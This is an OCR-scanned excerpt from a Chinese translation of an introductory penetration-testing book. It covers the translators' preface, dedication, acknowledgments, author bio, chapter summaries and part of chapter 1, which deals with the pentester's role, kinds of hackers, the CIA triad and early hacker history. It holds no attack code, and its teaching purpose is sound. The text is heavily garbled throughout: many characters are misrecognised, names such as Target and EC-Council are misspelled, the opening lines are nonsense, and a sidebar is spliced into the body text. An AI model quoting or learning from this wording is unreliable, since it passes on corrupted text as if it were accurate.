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= 型 
仿 洋 污 守 如 并 于 


名 马 洒 彰 院 料 避 


产品 编号 : 074947-01 


随 痢 计算 机 网 络 技 术 的 飞速 友 展 并 深入 到 经 济 和 社会 的 方方面面 ， 盗 用 身份 、 狠 取信 
了 日 益 强 烈 的 安全 防护 需求 ， 而 渗透 测试 正 是 查找 、 分 析 、 展 现 潜在 的 安全 问题 并 帮助 制 
定 策 略 以 降低 安全 风险 的 最 佳 手段 之 一 。 

渗透 测试 ， 又 称 “ 白 帽 黑客 ”测试 ， 是 出 于 增强 安全 性 的 目的 ， 在 得 到 授权 的 前 提 
下 ， 通 过 利用 与 恶意 攻击 者 相同 的 思路 、 技 术 、 策 略 和 手段 ， 对 给 定 组 织 机构 的 安全 问题 
进行 检测 和 评估 的 过 程 。 通 过 渗透 测试 ， 能 够 由 “ 知 彼 ”做 到 “知己 ”， 发 现 使 用 传统 检 
测 方法 无 法 发 现 的 攻击 路 径 、 攻 击 方法 和 技术 弱点 ， 从 而 在 安全 问题 被 攻击 者 利用 之 前 ， 
对 其 未 十 绸 纱 地 进行 修复 。 

本 书 作 者 Sean-Philip Oriyano 是 一 位 专注 于 安全 领域 25 年 的 资深 专家 ， 同 时 还 是 一 名 
美军 准尉 ， 指 挥 一 文 专门 从 事 网 络 安全 训练 、 开 发 和 策略 制定 的 网 络 战 分 队 ， 经 验 十 分 丰 
富 。 本 书 是 一 本 关于 渗透 测试 的 入 门 书籍 ， 适 用 于 具有 一 定 计算 机 技术 基础 、 希 望 更 深入 
学 习 渗透 测试 、 在 网 络 安全 领域 有 所 建树 的 读者 。 本 书 首先 从 攻击 者 的 视角 ， 介 绍 了 渗透 
测试 的 基本 概念 和 方法 论 ， 以 及 情报 收集 、 漏 铀 扫描、 密码 破解 、 维 持 访问 、 对 抗 防御 措 
施 、 无 线 网 络 与 移动 设备 攻击 、 社 会 工程 攻击 等 种 种 渗透 测试 手段 ;然后 从 防御 方 的 角度 
前 述 了 如 何 加 固 主 机 和 网 络 的 防护 ;最 后 给 出 了 如 何 规划 职业 发 展 ， 建 立 渗透 测试 实验 
室 ， 进 一 步 锻炼 渗透 测试 技能 的 指南 。 书 中 介绍 深入 浅 出 ， 提 供 了 丰富 的 操作 实例 和 章 后 
思考 题 ， 便 于 读者 实践 和 提高 。 

本 书 主要 内 容 由 李 博 、 杜 静 、 李 海 莉 翻译 ， 参 与 本 书 翻译 的 还 有 程 奋 思 、 韩 哲 、 泰 
定 鞋 、 庞 训 龙 、 了 和 孔 德 强 、 黄 赖 东 、 间 宇 、 隧 学 军 、 岁 赛 等 。 为 了 完美 地 翻译 本 书 ， 做 到 
“ 信 、 达 、 雅 ”， 译 者 们 在 翻译 过 程 中 查阅 、 参 考 了 大 量 的 中 英文 资料 。 当 然 ， 限 于 水 平 
和 精力 有 限 ， 翻 译 中 的 错误 和 不 当 之 处 在 所 难免 ， 我 们 非常 希望 得 到 读者 的 积极 反馈 以 利 
于 更 正和 改进 。 

感谢 本 书 的 作者 们 ， 于 字里行间 感受 到 你 们 的 职业 精神 和 专业 素养 总 是 那么 令 人 愉 
悦 ， 感谢 清华 大 学 出 版 社 给 予 我 们 从 事 本 书 翻译 工作 和 学 习 的 机 会 ， 感 谢 清华 大 学 出 版 社 
的 编辑 们 ， 他 们 为 本 书 的 翻译 、 校 对 投入 了 巨大 的 热情 并 付出 了 很 多 心血 ， 没 有 他 们 的 帮 
助 和 散 励 ， 本 书 不 可 能 顺利 付 样 。 

最 后 ， 硕 望 读者 通过 阅读 本 书 能 够 早日 掌握 渗透 测试 的 技术 精 艇 ， 成 为 一 名 “ 行 黑客 
手段 ， 显 白 帽 风范 ”的 安全 高 手 ! 


详 者 


本 书 献 给 我 的 父母 ， 他 们 赋予 我 成 长 过 程 中 尤为 宝贵 的 核心 价值 观 。 虽 然 父亲 已 经 离 
开 了 我 们 ， 但 我 仍然 能 时 时 处 处 感受 到 他 的 影响 ， 事 实 上 ， 我 有 时 会 感觉 自己 上 自 坚 地 开怀 
大 笑 的 样子 和 从 前 的 他 完全 一 样 。 我 的 母 杀 仍 在 人 世 ( 愿 她 健康 长 寿 )， 我 要 感谢 她 支持 和 
推动 我 钻研 科学 技术 ， 并 赋予 我 对 科幻 、 冷 笑话 的 热爱 以 及 对 正确 行事 的 奶 求 。 我 爱 你 们 
两 人 ， 这 本 书 首先 献 给 你 们 。 

我 也 想 把 这 本 书 献 给 军队 的 战友 ， 是 他 们 慷慨 地 给 予 我 就 读 候补 军官 学 校 (Officer 
Candidate School，OCS) 的 机 会 ， 尽 管 我 并 不 成 熟 并 且 以 目 我 为 中 心 。 虽 然 学 校 里 经 历 的 
磨难 当时 令 我 难以 人 忍受， 但 它 帮 助 我 的 生活 走 上 正轨 ， 并 认识 到 自己 的 能 力 。 它 也 帮助 我 
意识 到 重要 的 并 不 是 上 自己， 而 是 那些 生活 受 上 自己 影响 的 人 。 我 硕 望 阅读 这 本 书 的 读者 都 能 
思考 这 些 问 题 。 区 上 校 、A 中 校 、M 上 尉 、 D 上 尉 、J 上 尉 和 A 上 尉 ， 我 永远 感谢 你 们 对 我 
耐心 、 真 诚 、 直 接 、 坦 率 的 评价 。 我 希望 我 已 经 成 为 一 名 令 你 们 自 肾 的 准尉 。 这 本 书 也 
是 献 给 你 们 的 。 

我 最 后 还 要 将 这 本 书 献 给 我 的 团队 ， 你 们 展示 了 化 腐朽 为 神奇 的 能 力 。 在 过 去 的 一 年 
里 ， 你 们 一 直 不 断 地 给 我 惊 豆 。 你 们 让 我 光鲜 腕 丽 ， 但 我 不 能 自居 功劳 。 我 没有 承担 那些 
楷 重 的 工作 ， 是 你 们 承担 的 ; 我 缺乏 即兴 发 挥 的 能 力 和 创造 力 ， 是 你 们 提供 的 。E 上 士 、 
L 上 士 、S 上 士 和 N 堆 尉 ， 请 继续 出 类 拔 鞋 ， 启 得 芝 荃 。 我 还 要 感谢 我 的 指挥 官 L 中 校 ， 他 
信赖 我 的 能 力 ， 给 予 我 完成 这 一 切 的 支持 。 


a 


重复 一 次 ， 需 要 感谢 的 人 太 多 ， 我 真心 希望 没有 漏 卸任 何人 。 

首先 ， 感 谢 Jim Minatel 给 予 我 创作 这 本 书 的 机 会 ， 我 期 竺 今后 的 其 他 机 会 。 

接 下 来 ， 我 要 感谢 Kim Wimpsett。 你 无 疑 是 我 没有 因 语 言 和 辞 不 达意 的 段落 显得 四 大 
的 主要 原因 。 我 不 知道 如 何 表达 你 在 团队 中 的 价值 ， 我 希望 未 来 我 的 每 一 个 项 目 都 有 
你 加 入 。 

然后 ， 我 希望 回 美 国 军 队 的 所 有 人 致 以 谢意 ， 不 论 你 们 是 谁 。 虽 然 可 能 你 们 不 一 定 所 
有 人 都 能 安全 回 家 (当然 我 真诚 地 希望 都 能 )， 任 何人 都 永远 不 会 被 遗 起 。 而 当 我 穿 上 制服 
时 ， 不 仅 是 为 了 工作 ， 也 是 为 了 纪念 你 们 的 牺牲 。 


作者 简介 


Sean-Philip Oriyano 是 一 位 资深 安全 专业 人 士 和 企业 家 。 在 过 去 的 25 年 中 ， 他 将 时 间 
分 别 投 入 到 安全 研究 、 咨 询 和 提供 IT 以 及 网 络 安全 领域 的 培训 。 此 外 ， 他 还 是 一 位 在 数字 
和 印刷 媒体 出 版 方面 均 有 多 年 经 验 的 畅销 书 作 家 。 在 过 去 十 年 中 ，Sean 出 版 了 几 本 书 ， 并 
通过 参与 电视 和 广播 节目 进一步 扩大 了 他 的 影响 力 。 到 目前 为 止 ，Sean 已 经 参加 了 十 几 个 
电视 节目 和 广播 节目 ， 讨 论 不 同 的 网 络 安全 主题 和 技术 。 在 摄像 机 前 ，Sean 因 其 平易 近 人 
的 风度 而 著称 ， 并 因 深 入 浅 出 地 解释 复杂 话题 的 能 力 广 受 好 评 。 

除了 从 事 上 自己 的 商业 活动 ， 他 还 是 一 名 准尉 ， 指 挥 一 文 专门 从 事 网 络 安 全 训练 、 开 发 
和 战略 的 分 队 。 此 外 ， 作 为 一 名 准尉 ， 他 被 公认 为 是 其 领域 的 主题 专家 ， 经 常 在 需要 时 被 
要 求 提 供 专业 知识 、 塔 训 和 指导 。 

在 不 工作 时 ，Sean 是 一 位 狂热 的 障碍 赛跑 运动 员 ， 已 经 完成 了 多 项 赛事 ， 其 中 包括 一 
项 世界 冠军 锅 标 赛 ， 四 次 斯 巴 达 三 项 大 满 贯 。 他 还 喜欢 旅游 、 健 身 、MMA 格 斗 、 玩 游戏 
“银河 战士 ”和 “ 塞 尔 达 传说 ”。 


响 


安全 是 当今 世界 党 到 高 度 重 视 的 主题 之 一 。 由 于 人 们 越 来 越 依 赖 不 同形 式 的 技术 、 随 
吴 数字 产品 以 及 许多 其 他 类 型 的 系统 和 设备 ， 对 这 些 设 备 和 系统 实际 安全 性 完 竟 如 何 的 关 
注 与 日 俱 增 。 为 了 应 对 诸如 刁 份 次 用、 信息 贸 取 、 服 务 中 断 、 黑 客运 动 甚至 恐怖 主义 等 网 
络 犯 徘 的 增加 ， 许 多 公共 和 私人 组 织 面临 着 必须 在 目 己 成 为 网 络 犯罪 的 受害 者 以 及 发 生 诉 
讼 之 前 对 这 些 潜在 安全 性 问题 进行 测试 、 评 估 和 修复 的 挑战 。 正 是 为 了 应 对 过 去 、 现 在 和 
未 来 的 此 类 情况 ， 许 多 组 织 正在 仓促 实施 或 寻求 各 种 安全 解决 方案 。 

因此 ， 渗 透 测试 者 应 运 而 生 ， 他 们 背后 代表 的 是 合 找 、 人 分析、 呈现 和 推荐 策略 以 降低 
安全 事件 引起 的 潜在 风险 的 最 佳 和 最 有 效 手段 之 一 。 滩 透 测 试 者 是 那些 利用 他 们 对 技术 及 
其 漏洞 和 优势 的 深刻 理解 ， 应 客户 的 要 求 抢 在 对 组 织 不 怀 好 意 者 之 前 定位 和 评估 安全 问题 
的 人。 


本 书 谈 者 对 象 


本 书 的 目标 受众 包括 那些 已 经 拥有 一 定 技术 背景 并 希望 进入 渗透 测试 领域 的 人 。 与 许 
多 涵 凑 渗透 测试 主题 的 其 他 书籍 不 同 ， 本 书 力 图 以 简单 易 懂 的 方式 介绍 该 主题 。 本 书 的 目 
标 是 帮助 读者 更 好 地 了 解 渗透 测试 过 程 ， 并 通过 学 习 各 种 渗透 测试 基础 理论 和 实践 练习 获 
得 经 验 和 知识 。 

在 完成 本 书 之 后 ， 你 应 该 能 对 成 为 渗透 测试 者 的 意义 以 及 成 功 所 需 的 技能 、 工 具 和 
通用 知识 有 一 个 更 好 的 了 解 。 在 完成 本 书 并 且 练 习 了 所 学 内 容 后 ， 就 掌握 了 寻求 更 先进 技 
术 、 测 试 方法 和 技能 所 需 的 工具 。 


本 书 使 用 条 件 


要 充分 利用 本 书 的 价值 ， 需 要 有 一 些 便利 条 件 。 在 开始 之 前 ， 你 应 该 有 一 台 至 少 具有 
8GB RAM 的 能 够 运行 最 新 版 本 微软 Windows 或 Kali Linux 的 计算 机 。 此 外 ， 你 应 该 有 能 够 
使 用 的 虚拟 化 软件 ， 如 Oracle 的 VirtualBox 或 VMware 的 产品 ;选择 使 用 何 种 虚拟 化 软件 取 
决 于 个 人 喜好 和 经 济 能 力 。 

在 你 阅读 本 书 的 过 程 中 ， 将 回 你 介绍 用 于 完成 任务 的 基于 硬件 和 软件 的 工具 。 在 章节 
和 习题 中 ， 将 给 出 所 选 工具 的 下 载 链接 或 通过 其 他 方式 获取 的 方法 。 


各 章 内 容 提要 


本 书 涵盖 了 广泛 的 渗透 测试 入 门 主题 。 下 面 列 出 了 各 章 及 其 关注 重点 的 简介 。 

第 1 章 “渗透 测试 简介 ” ”该 章 重点 介绍 渗透 测试 的 一 般 原理 ， 以 及 成 功 所 需 的 技能 
和 知识 。 

第 2 章 “ 操 作 系 统 与 网 络 简介 ” ”对 操作 系统 及 其 所 连接 网 络 的 结构 有 着 扎实 了 解 是 
渗透 测试 者 所 必需 的 。 该 章 探讨 两 者 的 基本 原理 ， 以 奠定 学 习 的 基础 。 

第 3 章 “ 密 码 学 简介 ” ”如 果 没 有 加 密 技 术 ， 很 多 用 于 防止 无 意 泄露 信息 的 手段 将 无 
法 正常 工作 。 另 外 ， 如 果 不 了 解密 码 学 ， 满 足 各 种 法 律 法 规 的 要 求 将 非常 困难 。 该 章 介绍 
密码 学 功能 和 机 制 以 及 如 何 应 用 的 基础 知识 。 

第 4 章 “渗透 测试 方法 学 综述 ” ”为 了 可 靠 地 获得 最 完整 和 最 有 效 的 结果 ， 渗 透 测 试 
有 一 套 必须 遵循 的 流程 和 方法 。 在 该 章 中 ， 将 介绍 最 流行 的 执行 渗透 测试 的 方法 。 

第 5 章 “ 情 报 收集 ” ”渗透 测试 过 程 的 第 一 步 是 收集 有 关 目 标的 信息 。 在 该 章 中 ， 将 
探讨 收集 信息 的 各 种 手段 ， 以 及 如 何 将 它们 集成 到 整个 渗透 过 程 中 。 

第 6 章 “ 扫 描 和 枚 举 ” ”一 旦 收集 到 关于 目标 的 足够 的 情报 ， 即 可 开始 探测 并 找 出 可 
以 提取 哪些 信息 。 该 章 包 括 如 何 获取 用 户 名 、 组 、 安 全 策略 等 信息 。 

第 7 章 “ 实 施 漏洞 扫描 ”” 想 采取 一 种 不 同 的 方法 了 解 目 标 ? 那么 ， 可 以 使 用 手动 或 
自动 漏洞 扫描 的 过 程 ， 定 位 环境 中 的 弱点 ， 以 供 以 后 利用 。 

第 8 章 “ 破 解密 码 ” ”由 于 密码 是 许多 环境 和 应 用 程序 的 第 一 线 防御 ， 因 此 必须 在 获 
取 这 些 有 价值 信息 的 过 程 中 投入 一 定时 间 。 在 枚 举 中 已 经 获得 了 用 户 名 ， 所 以 可 以 专注 于 
收集 这 些 用户 名 的 密码 。 

第 9 章 “使 用 后 门 和 恶意 软件 保持 访问 权 ” ”通过 调查 、 探 索 、 突 破 ， 现 在 你 已 进入 
系统 。 但 是 ， 在 获得 访问 权 并 建立 这 个 滩头 阵地 后 ， 如 何 才能 保住 它 ? 该 章 要 探讨 的 正 是 
相关 内 容 。 

第 10 章 “报告 ” 记 住 ， 你 是 在 根据 合同 为 客户 工作 ， 目 标 是 查找 问题 并 报告 你 的 发 
现 。 在 该 章 中 ， 将 介绍 报告 的 一 般 格 式 和 谍 篇 布局 。 

第 11 章 “应 对 安防 和 检测 系统 ” ”当然 并 非 所 有 的 系统 都 是 门户 大 开 ， 等 待 渗透 的 。 
事实 上 ， 许 多 系统 中 会 有 几 层 不 同形 式 的 防御 ， 严 阵 以 待 。 在 这 种 情况 下 ， 入 侵 检 测 和 预 
防 系统 是 渗透 测试 者 的 死敌 ， 而 在 该 章 中 将 学 习 如 何 应 对 它们 。 

第 12 章 “隐藏 踪迹 与 规避 检测 ” ”在 犯罪 现场 留 下 线索 极 易 导 致 被 抓 住 和 挫败 。 在 该 
章 中 ， 将 学 习 如 何在 事后 进行 清理 ， 以 使 除了 最 坚定 的 人 都 无 法 发 现 你 。 

第 13 章 “探测 和 攻击 无 线 网 络 ” ”无 线 网 络 普遍 存在 ， 因 此 几乎 在 任何 你 所 探索 的 环 
境 中 都 需要 应 对 它 。 如 果 这 些 环境 中 包括 移动 设备 ， 就 必然 会 遇 到 此 类 网 络 ， 然 后 即 可 将 
之 作为 目标 。 

第 14 章 “移动 设备 安全 ” ”无 论 你 如 何 看 待 移动 设备 ， 移 动 设备 都 不 会 就 此 停 下 发 展 
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的 脚步 ， 而 是 不 断 推 出 新 的 形式 、 功 能 、 外 形 ， 并 且 已 成 为 我 们 日 常生 活 中 的 一 部 分 。 由 
于 它们 已 被 整合 到 商业 环境 中 ， 并 且 商 业 和 个 人 使 用 之 间 的 界限 已 经 模糊 ， 因 此 你 必须 学 
习 如 何 应 对 移动 设备 。 

第 15 章 “进行 社会 工程 攻击 ” 在 每 个 系统 中 都 有 一 个 最 弱 的 环节 ， 在 许多 情况 下 ， 
最 弱 的 环节 是 人 类 。 作 为 一 名 渗透 测试 人 员 ， 可 以 利用 你 的 伶 牙 俐 上 从、 心理 学 和 巧妙 的 措 
辞 ， 将 谈话 引 疝 那些 能 够 提供 有 用 信息 的 话题 。 

第 16 章 “加 固 主机 系统 ” 有 着 各 种 可 用 于 迟滞 或 阻止 攻击 的 对 策 。 最 外 层 防 线 之 一 
是 经 常 锁定 或 者 加 固 系统 ， 以 减少 其 被 破坏 的 机 会 。 

第 17 章 “加 固 你 的 网 络 ” 与 加 固 主机 一 样 ， 具 有 可 用 于 捞 灌 或 阻止 对 网 络 的 攻击 的 
对 策 。 删 除非 必要 协议 ， 应 用 防火 墙 和 其 他 机 制 可 以 迟滞 并 挫败 攻击 者 。 

第 18 章 “规划 职业 成 功 之 路 ” 在 该 章 中 ， 将 自己 视 为 一 名 毕业 生 。 现 在 你 正在 寻求 
未 来 在 渗透 测试 领域 的 发 展 。 该 章 将 提供 下 一 步 应 如 何 继续 培养 技能 的 指南 。 

第 19 章 “建立 一 个 渗透 测试 实验 室 ” 一 名 好 的 渗透 测试 者 需要 在 实践 中 练习 所 拥有 
的 装备 。 在 该 章 中 ， 我 们 将 探讨 如 何 建立 一 个 可 用 于 实践 和 实验 的 基础 实验 室 。 
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渗 项 测 孔 简介 


你 已 决定 成 为 一 名 渗透 测试 者 (通常 被 称 为 pentester)， 但 还 不 知 如 何 入 手 ? 本 书 将 帮 
助 你 了 解 成 为 渗透 测试 者 的 意义 ， 以 及 这 一 角色 需要 具备 的 技术 和 和 担负 的 道义 责任 。 你 将 
获得 在 渗透 和 实践 安全 领域 取得 成 功 所 必 备 的 技能 。 

具体 而 言 ， 你 将 接触 到 多 种 正在 用 于 黑客 攻防 第 一 线 的 方法 ; 同时 ， 还 将 接触 到 可 用 
于 渗透 测试 中 以 获取 信息 或 建立 用 于 发 起 更 高 级 攻击 的 支撑 点 的 种 种 技术 。 

男 外 ， 了 解 攻击 者 的 动机 有 助 于 掌握 攻击 范围 甚至 知晓 攻击 细节 。 事 实 上 ， 需 要 站 在 
攻击 者 的 角度 以 理解 他 们 发 起 攻击 的 原因 ， 继 而 利用 这 种 经 验 来 测试 客户 的 网 络 。 


本 草 将 学 习 : 
渗透 测试 的 定义 及 渗透 测试 者 的 工作 内 容 
全 为 何 要 保护 机 密 性 、 完 整 性 和 可 用 性 
全 回顾 黑客 和 渗透 测试 的 历史 


在 当今 世界 中 ， 由 于 各 类 组 织 不 得 不 更 为 认真 地 审视 其 安全 态势 及 改善 方法 ， 渗 透 测 
试 者 变 得 更 为 重要 。 诸 如 零售 已 头 挫 吝 特 (Targeb 百 货 以 及 娱乐 已 头 索 尼 (Sony) 公 司 遭 受 的 
攻击 等 一 些 重大 安全 事件 ， 引 发 了 人 们 对 于 训练 有 素 、 技 能 丰富 ， 能 够 了 解 系统 弱点 并 能 
予以 定位 的 安全 专家 的 需求 的 关注 。 通 过 采取 一 套 综 合 了 技术 、 行 政和 物理 手段 的 程序 ， 
许多 组 织 机 构 已 经 学 会 抵御 他 们 系统 中 的 漏洞 。 

@ 技术 手段 包含 运用 虚拟 专用 网 (Virtual Private Network，VPN)、 加 密 协 议 、 入 侵 
检测 系统 (Intrusion Detection System，IDS)、 入 侵 防 御 系 统 (Intrusion Prevention 
System，IPS)、 访 问 控 制 列 表 (Access Control List，ACL)、 生 物 识 别 技术 、 智 能 卡 
技术 以 及 其 他 有 助 于 提高 安全 性 的 装置 。 

@ 行政 手段 包含 运用 政策 、 规 程 以 及 其 他 在 过 去 的 十 年 间 应 用 和 加 强 的 规则 。 

@ 物理 手段 包含 运用 诸如 电缆 锁 、 设 备 锁 、 报 警 系 统 和 其 他 类 似 设备 。 

作为 一 名 渗透 测试 者 ， 必 须 为 测试 包含 上 述 一 种 或 多 种 技术 的 各 类 环境 以 及 几乎 数 不 
胜 数 的 其 他 情况 做 好 准备 。 那 么 ， 渗 透 测 试 者 到 底 承担 了 什么 角色 ? 


1.1.1 ”渗透 测试 者 的 工作 内 容 


渗透 测试 者 通常 由 组 织 机 构 以 内 部 员工 或 外 部 实体 (例如 按 职位 或 按 项 目的 承包 商 ) 的 
形式 雇佣 。 不 管 采 取 何 种 雇佣 形式 ， 渗 透 测试 者 都 要 开展 渗透 测试 : 利用 与 恶意 攻击 者 相 
同 的 技术 、 策 略 和 手段 ， 对 给 定 组 织 结 构 的 安全 性 进行 调查 、 评 估 和 测试 。 渗 透 测 试 者 与 
恶意 攻击 者 的 主要 不 同 在 于 目的 以 及 是 否 获 得 所 评估 系统 的 所 有 者 的 法 律 许可 。 此 外 ， 渗 
透 测试 者 不 得 回 除 客户 指定 人 员 之 外 的 任何 人 透露 测试 结果 。 为 保证 双方 权益 ， 座 用 者 通 
常会 与 渗透 测试 者 签署 一 份 保密 协议 (Nondisclosure Agreement，NDA)。 这 么 做 既 可 以 保 
护 公司 的 财产 ， 又 可 允许 渗透 测试 者 访问 内 部 资源 。 最 终 ， 渗 透 测 试 者 根据 合同 为 公司 服 
务 ， 而 合同 规定 了 哪些 行为 是 违规 的 以 及 在 测试 结束 时 渗透 测试 者 需要 提交 哪些 内 容 。 合 
同 的 所 有 细节 取决 于 组 织 机 构 的 具体 需求 。 

其 他 一 些 术 语 也 常用 于 称呼 渗透 测试 者 : 渗透 测 斌 人员、 道德 黑客 和 日 帽 黑客 。 所 有 
这 些 术 语 都 是 正确 的 ， 它 们 摘 述 的 是 同一 类 人 员 ( 尽 管 在 某 些 场 合 有 的 人 可 能 会 就 这 些 明 
显 的 近义词 展开 争论 )。 通 第 情况 下 ， 最 常用 的 是 渗透 测试 者 。 不 过 国际 电子 商务 顾问 局 
(EC-Councij) 在 它 自 己 的 证 书 “ 道 德 黑 客 认证 (Certified Ethical Hacker)” 中 使 用 的 是 “道德 
黑客 ”这 一 称呼 。 

在 某 些 场合 ， “什么 人 才 算 是 黑客 ”一 直 是 一 个 热 议 
Pp ”为 保险 起 见 ， 不 想 造 ”话题 。 几 年 来 ， 笔 者 兽 就 “黑客 ”这 一 术语 是 冤 是 贬 参 与 过 
成 困扰 的 专业 人 士 应 避免 ”许多 有 趣 的 讨论 。 许 多 黑客 坏事 做 尽 、 百 无 一 益 ， 电 影 、 电 
使 用 淋 客 一 词 , 以 免 。 视 、 书 籍 及 其 他 媒体 上 也 往往 正 是 这 样 描写 他 们 的 。 然 而 ， 
引起 守 让 可能 的 宫 俺 。 黑客 也 发 生 了 进化 ， 这 一 术语 不 再 只 指 那些 从 事 犯 罪 的 人 。 
WE ”事实 上 ， 许 多 黑客 已 经 表明 ， 尽 管 他 们 具备 犯罪 和 毁灭 的 能 
力 ， 但 他 们 更 有 兴趣 的 是 与 客户 和 他 人 交流 以 帮助 他 们 提高 

安全 性 或 进行 相应 研究 。 


1.1.2 ”识别 对 手 


在 现实 世界 中 ， 可 以 对 黑客 分 门 别 类 ， 以 区 分 他 们 的 技能 和 意图 。 

脚本 小 子 。” 此 类 黑客 只 获得 了 了 有限 的 训练 或 完全 未 经 训练 ， 只 知道 如 何 使 用 基本 的 
工具 或 技术 。 他 们 甚至 可 能 完全 不 理解 自己 正在 做 什么 。 

白 帽 黑客 ”此 类 黑客 按照 攻击 团队 的 方式 思考 ， 但 为 好 人 服务 。 一 般 认 为 他 们 的 特征 
是 ， 有 着 一 套 通常 被 视 为 道德 规范 的 “不 造成 任何 损害 ”的 原则 。 这 个 群体 也 被 称 为 渗透 
测试 者 。 

灰 帽 黑客 ”此 类 黑客 游 走 在 黑白 两 道 之 间 ， 现 已 决定 改 弦 更 张 ， 弃 恶 从 善 。 但 即使 已 
改过 目 新 ， 仍 不 能 完全 信任 他 们 。 为 外 ， 在 现代 安全 界 ， 这 类 人 员 也 会 发现 并 利用 漏洞， 
而 后 将 结果 提供 给 供应 商 ， 可 能 免费 ， 也 可 能 换取 茶 种 形式 的 报酬。 


黑 帆 黑客 ”此 类 黑客 是 违反 法 律 的 恶 徒 。 他 们 的 行动 可 能 有 一 定 的 计划 ， 也 可 能 
无 规律 可 言 。 在 大 多 数 情况 下 ， 黑 帽 黑 客 的 做 法 和 彻头彻尾 的 犯罪 行为 之 间 并 没有 太 大 
区 列 。 


网 络 恐 怖 分 子 ” 网 络 忍 怖 分 子 是 一 种 新 形式 的 攻击 者 ， 他 们 试图 摧毁 目标 而 不 考虑 隐 
藏身 份 。 本 质 上 他 们 是 为 证 明 茶 个 观点 ， 而 并 不 担心 被 捕 或 入 狱 。 


1.2 保护 机 密 性 、 和 完整 性 与 可 用 性 


任何 有 安全 意识 的 组 织 都 在 努力 维护 CIA 安 全 三 要 素 ， 即 机 密 性 (confidentiality)、 完 
整 性 (integrity) 和 可 用 性 (availability) 这 三 个 核心 原则 。 以 下 列表 描述 了 其 核心 概念 。 在 履 
行 渗 透 测 试 任务 和 职责 时 应 牢记 这 些 概念 。 

机 密 性 ”这 是 指 对 信息 的 保护 ， 使 其 免 遭 非 授 权 者 获取 。 用 于 保护 机 密 性 的 控制 措施 
是 权限 和 加 密 。 

完整 性 ”这 是 指 将 信息 保持 为 一 种 可 保留 其 原始 意图 的 格式 ， 即 接收 者 打开 的 数据 
创建 者 意图 创建 的 数据 相同 。 

可 用 性 ”这 是 指 保证 信息 和 资源 对 需要 它们 者 可 用 。 简 而 言 之 ， 无 论 信息 或 资源 多 么 
安全 ， 如 果 不 能 在 需要 时 就 绪 并 且 可 用 ， 它 们 将 坚 无 用 处 。 

在 进行 系统 安全 性 评估 和 规划 时 ，CIA 准 则 即使 不 是 最 重要 的 保障 目标 ， 也 是 最 重要 
的 目标 之 一 。 在 瞄准 一 个 系统 后 ， 攻 击 者 便 会 尝试 破坏 或 扰乱 这 些 目标 。CIA 安 全 三 要 素 
的 相辅相成 关系 如 图 1.1 所 示 。 


与 


完整 性 
图 1.1 CIA 安 全 三 要 素 


为 何 CIA 安 全 三 要 和 聚 如 此 重要 ? 考虑 一 人 下， 如果 投资 公司 或 国防 承包 商 遭 党 了 被 茶 个 
恶意 团体 泄密 的 事件 ， 会 产生 怎样 的 后 果 ? 结果 将 是 灾难 性 的 ， 更 不 用 提 它 可 能 会 使 组 织 
面临 严重 的 民事 甚至 刑事 风险 。 作 为 一 个 渗透 测试 者 ， 要 做 的 就 是 努力 在 客户 的 环境 中 发 


现 破 坏 CIA 准 则 的 漏洞 并 搞 清 楚 其 机 理 ， 而 另 一 种 分 析 该 问题 的 角度 是 使 用 一 种 本 书 称 为 
反 CIA 准 则 ( 见 图 1.2) 的 工具 。 


未 授权 修改 
图 1.2” 反 CIA 准 则 


不 当 泄 露 这 是 指 由 于 玻 忽 、 事 故 或 恶意 ， 导 致 信 息 或 资源 回 外 泄露 或 得 以 访问 。 简 
而 言 之 ， 如 果 不 是 有 权 访 问 对 象 的 人 ， 那 么 永远 不 应 访问 到 它 。 

未 授权 修改 它 是 完整 性 的 对 立 面 ， 是 指 未 经 授权 或 其 他 形式 的 信息 修改 。 这 种 修改 
可 能 是 由 于 错误 、 意 外 访问 或 者 主观 恶意 造成 的 。 

中 断 ( 亦 称 损失 ) 这 是 指 失 去 对 信息 或 资源 的 访问 ， 而 本 不 应 该 这 样 。 本 质 上 ， 当 需 
要 时 而 不 在 其 处 的 信息 就 是 无 用 的 。 虽 然 信 息 或 其 他 资源 不 可 能 100% 可 用 ,但 某 些 组 织 
花费 时 间 和 金钱 来 获得 99.999% 的 正常 运行 时 间 ， 这 相当 于 平均 每 年 只 有 约 6 分 钟 的 停机 
时 间 。 


1.3 黑客 进化 史 漫 谈 


渗透 测试 者 的 角色 常 第 成 为 IT 安 全 行业 中 吻 被 误解 的 职位 之 一 。 为 了 了 解 这 个 角色 ， 

首先 需要 回顾 一 下 渗透 测试 者 的 前 身 ( 即 黑客 ) 的 进化 史 。 
“黑客 ”一 词 已 有 很 长 历史 ， 其 源头 可 以 奶 调 到 五 十 余年 前 (20 世 纪 60 年 代 ) 的 那些 技 

术 狂 人 。 这 些 人 和 今天 的 黑客 不 一 样 ， 他 们 只 不 过 是 对 新 技术 有 好 奇 心 和 热情 ， 并 人 花 时 间 
探索 早期 系统 内 在 机 理 和 局 限 性 的 人 。 早 期 ， 这 些 黑客 会 寻找 目标 系统 ， 并 尝试 通过 发 气 
系统 的 新 功能 或 发 现 对 当时 技术 而 言 未 公开 或 未 知 的 秘密 来 挑战 极限 。 虽 然 技 术 已 经 取得 
了 长 足 的 进步 ， 但 这 些 早期 黑客 的 理念 却 一 直 得 以 延续 。 

黑客 一 词 在 技术 行业 中 具有 双重 意义 ， 它 既 可 以 描述 软件 程序 员 ， 也 可 以 描述 那些 未 
经 许可 侵入 计算 机 和 网 络 的 人 。 前 者 的 含义 更 为 正面 ， 而 后 者 则 市 有 贬义 。 几 涉及 计算 机 


或 其 他 相关 技术 时 ， 必 使 用 黑客 一 词 的 新 闻 媒 体 使 其 含义 更 加 混乱 。 基 本 上 ， 新 闻 媒 体 、 
电影 和 电视 节目 会 把 任何 改变 技术 或 具有 高 水 平 知识 的 人 称 为 黑客 。 

回顾 这 些 早 期 的 技术 爱好 者 时 ， 可 以 发 现 他 们 有 一 个 共同 的 特点 ， 那 就 是 对 新 技术 
的 好 奇 心 和 对 学 习 新 事物 的 渴望 。 最 初 的 黑客 们 的 好 奇 心 是 由 院 校 或 企业 中 的 大 型 机 激 
发 的 。 而 随 着 时 间 的 推移 ， 个 人 电脑 (PC) 引 起 了 他 们 的 注意 ， 因 为 它 是 一 项 全 新 的 、 光 让 
四 射 的 技术 ， 有 竺 探索、 解析 和 利用 。 事 实 上 ， 早 期 PC 机 (的 普及 ) 使 得 相 比 之 前 的 短暂 年 
代 ， 能 够 有 更 多 的 人 继承 技术 爱好 者 和 黑客 的 衣钵 。20 志 纪 90 年 代 ，Intemet 使 得 黑客 能 够 
